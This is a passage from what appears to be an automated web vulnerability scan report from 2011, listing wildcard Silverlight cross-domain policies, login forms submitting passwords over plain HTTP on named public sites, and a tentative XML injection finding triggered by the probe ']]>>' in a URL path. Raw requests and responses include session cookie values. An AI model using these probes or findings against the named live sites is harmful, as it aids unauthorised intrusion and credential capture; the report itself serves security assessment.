7.24. http://tv.msnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tv.msnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: tv.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:01:30 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.25. http://www.msnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:07:03 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.redacted"/>
<domain uri="https://*.msnbc.redacted"/>
...[SNIP]...

7.26. http://services.money.redacted/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.money.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: services.money.redacted

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 23:35:24 GMT
Accept-Ranges: bytes
ETag: "04698de7abecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:34:35 GMT
Connection: close
Content-Length: 649

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="http://appsrv.sandblu.msn-int.com"/>
<domain uri="http://colstc.redacted"/>
<domain uri="http://colstj.redacted"/>
<domain uri="http://blstj.redacted"/>
<domain uri="http://blstc.redacted"/>
...[SNIP]...

8. Cleartext submission of password
There are 13 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


8.1. http://digg.com/search

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:21:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24569 10.2.128.190
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7917


<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, po
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.2. http://eurekalert.org/

Summary

Severity:   High
Confidence:   Certain
Host:   http://eurekalert.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: eurekalert.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:14 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
X-Powered-By: PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 64809

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org /TR/REC-html40/loose.dtd">
<html>
<head>
<title>EurekAlert! - Science News</title>
<meta http-equiv=content-type c
...[SNIP]...
</tr>
       <form action="http://www.eurekalert.org/login.php" name="login" method="POST">
<tr>
...[SNIP]...
<img src="http://www.eurekalert.org/images/shared/spacer.gif" width="12" height="6" alt="" /><input type="PASSWORD" name="password" size="15" class="IB_InputMedium" maxlength="31" onChange="document.login.click()"></td>
...[SNIP]...

8.3. http://msn.chemistry.com/cp/landing/44762

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.chemistry.com
Path:   /cp/landing/44762

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /cp/landing/44762 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=d278fc94-dbd7-4a08-8cb6-0a6b0f3e8a2e; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Session=SID=99B544F5-72EC-4453-B766-5821666E8BC4&Th=11&TID=508259; path=/
Set-Cookie: UMID=c7fdb268-bc89-4e0a-b9a5-5a3cbc611c0e; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28579

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
</div> <form class="register" id="frmReg" method="POST"> <input name="hdnPROID" type="hidden" value="1"/>
...[SNIP]...
<td colspan="3"><input name="password" type="password" id="password" class="columnWidth" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:9px;" /></td>
...[SNIP]...

8.4. http://msn.chemistry.com/cp/landing/57269

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.chemistry.com
Path:   /cp/landing/57269

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /cp/landing/57269 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=8529a559-f7f1-4949-aed2-acc51bf1723b; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Session=SID=A963DE98-E013-45FE-A22F-7F3E03113FAE&Th=11&TID=508259; path=/
Set-Cookie: UMID=6abfa29e-5c60-42a5-b7be-7db42c89c8cb; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
<!--START REG FORM FIELDS --> <form class="register" id="frmReg" method="POST"> <input name="hdnPROID" type="hidden" value="1"/>
...[SNIP]...
<td colspan="3"><input name="password" type="password" id="password" class="columnWidth" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:9px;" /></td>
...[SNIP]...

8.5. http://spacefellowship.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://spacefellowship.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: spacefellowship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:03 GMT
Server: Apache
Set-Cookie: sfs_session=cc2c07278f598760f84f6726d5e79843; expires=Sat, 19-Jan-2013 02:19:03 GMT; path=/; domain=spacefellowship.com; httponly
Connection: close
Content-Type: text/html; charset: utf-8
Content-Length: 92137

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...
<div id="plWindow">
   <form id="frmlogin" name="frmlogin" method="post" action="/login?redirect=%2F">
       <div id="plClose">
...[SNIP]...
<input class="DefaultInput" id="plInputUsr" name="username" value="" type="text" />
               <input class="DefaultInput" id="plInputPass" name="password" value="" type="password" />
               <div id="plAutoLogin">
...[SNIP]...

8.6. http://www.dailygrail.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailygrail.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com
Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT
ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:32 GMT
Server: lighttpd
Content-Length: 63252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr">
<head>
<meta http-eq
...[SNIP]...
<div class="content">
<form action="/content/Daily-Grail-Frontpage?destination=node%2F7931" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

8.7. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 29 Jan 2011 23:53:34 GMT
Date: Sat, 29 Jan 2011 23:53:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

8.8. http://www.polls.newsvine.com/_vine/js/m1/vine.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_vine/js/m1/vine.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /_vine/js/m1/vine.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://polls.newsvine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-360; jt_time=1296350654008; sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Fri, 26 Mar 2010 01:03:28 GMT
ETag: "1258584-113ed-482a9bb29b800"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=470797
Expires: Sat, 05 Feb 2011 01:54:30 GMT
Date: Sun, 30 Jan 2011 15:07:53 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 70637


// set global defaults
var pokeURL = typeof(globalPokeURL) != 'undefined' ? globalPokeURL : 'http://log.newsvine.com/poke.gif';
var imgRoot = typeof(globalImgRoot) != 'undefined' ? globalImgRoot : 'h
...[SNIP]...
</h3><form method="post" action="'+loginRoot+'">';
   iHTML += '<input type="hidden" name="redirect" value="'+vine.session.webRoot+'/_nv/accounts/login" />
...[SNIP]...
<div>Password: <input type="password" name="password" style="width: 130px; margin-bottom: 5px" /></div>
...[SNIP]...

8.9. http://www.scientificamerican.com/blog/observations/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scientificamerican.com
Path:   /blog/observations/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /blog/observations/ HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=155211547;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: CFTOKEN=84610132;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: SSCIAMUSER=;path=/
Set-Cookie: CFID=155211547;path=/
Set-Cookie: CFTOKEN=84610132;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211547%26CFTOKEN%23%3D84610132%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23hitcount%3D2%23cftoken%3D84610132%23cfid%3D155211547%23;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 70039
Date: Sat, 29 Jan 2011 22:32:21 GMT
X-Varnish: 461255158
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
   <!--[if IE]><![endif]-->
   <title>Observations: Scientific American Blogs</title>
   <meta charset="utf-8" />
   <meta name="description" content="" />
   <met
...[SNIP]...
</h3>
       <form id="login" action="http://www.scientificamerican.com/view/utils/overlays.cfc?WSDL&method=loginUser" class="asyncForm">
           <fieldset>
...[SNIP]...
<label for="password">
                   Password
                   <input type="password" id="password" value="" name="password" />
               </label>
...[SNIP]...

8.10. http://www.six-telekurs.com/tkfich_index/tkfich_home.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.six-telekurs.com
Path:   /tkfich_index/tkfich_home.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /tkfich_index/tkfich_home.htm HTTP/1.1
Host: www.six-telekurs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:20 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m PHP/5.2.13 mod_perl/2.0.4 Perl/v5.8.8
Content-Type: text/html
Last-Modified: Sun, 30 Jan 2011 02:03:20 GMT
ETag: "74935320-01010000"
Expires: Sun, 30 Jan 2011 01:03:20 GMT
Cache-Control: no-cache
Content-Length: 26752
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="http://www.six
...[SNIP]...
<table cellspacing="0" cellpadding="0" border="0" align="center" width="100%">
   <FORM name="myform" method="post" target="_top" onSubmit="Speichern(); return OnSubmitForm();">
   <INPUT TYPE="HIDDEN" Name="FD_AUTH">
...[SNIP]...
<td class="stytextindex" valign="top" style="padding-left:3px"><INPUT TYPE="PASSWORD" NAME="password" size="9" VALUE="" MAXLENGTH="16" class="stytextindex"><img src="spacer.gif" width="1" height="16">
...[SNIP]...

8.11. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stylemepretty.com
Path:   /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:03:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Mon, 30-Jan-2012 02:03:25 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 02:03:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40283


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 7]><![endif]-->
<!--[if lt IE 7]><![endif]-->
<html xmlns="http://
...[SNIP]...
<div id="sign-in">
<form method="post" action="http://circle.stylemepretty.com/wp-login.php">
<input type="submit" value="Log In" id="log-in" name="wp-submit" />
...[SNIP]...
<input type="text" name="log" id="sign-in-username" />
<input type="password" name="pwd" id="sign-in-password" />
<input type="submit" value="Go" id="sign-in-btn" />
...[SNIP]...

8.12. http://www.unmannedspaceflight.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.unmannedspaceflight.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.unmannedspaceflight.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:41 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.5 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8b
X-Powered-By: PHP/5.2.5
Set-Cookie: session_id=47217f8154e2e2ad81f66ad14c4bf133; path=/; httponly
Connection: close
Content-Type: text/html
Content-Length: 87221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<td align="right" valign="middle">
       
           <form action="http://www.unmannedspaceflight.com/index.php?s=47217f8154e2e2ad81f66ad14c4bf133&amp;act=Login&amp;CODE=01&amp;CookieDate=1" method="post">
               <input type="text" size="20" name="UserName" onfocus="focus_username(this)" value="User Name" />
               <input type="password" size="20" name="PassWord" onfocus="focus_password(this)" value="------" />
               <input class="button" type="image" src="style_images/ip.boardpr/login-button.gif" />
...[SNIP]...

8.13. http://www.zacks.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zacks.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:12 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=6ssok6pvga1gucejl91shelqj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 02:04:12 GMT; path=/; domain=.zacks.com
Connection: close
Content-Type: text/html
Content-Length: 133254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- DC_PAGE_ID: 1, ADID: -->
<html lang="en">
<head>
<meta http-equiv="refresh" content="300
...[SNIP]...
</tr>-->
   <form name=jsloginform method="POST" onSubmit="return JSloginCheck();">
   <tr>
...[SNIP]...
<td class="content" width="75" NOWRAP>
           <INPUT type="password" size="10" maxlength="50" name="password" value="" style="width:70px;">
       </TD>
...[SNIP]...

9. XML injection
There are 27 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the role that the relevant input plays in the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


9.1. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d775684/10/38973908/decide.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adsc]]>>/d775684/10/38973908/decide.php HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 19:29:46 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
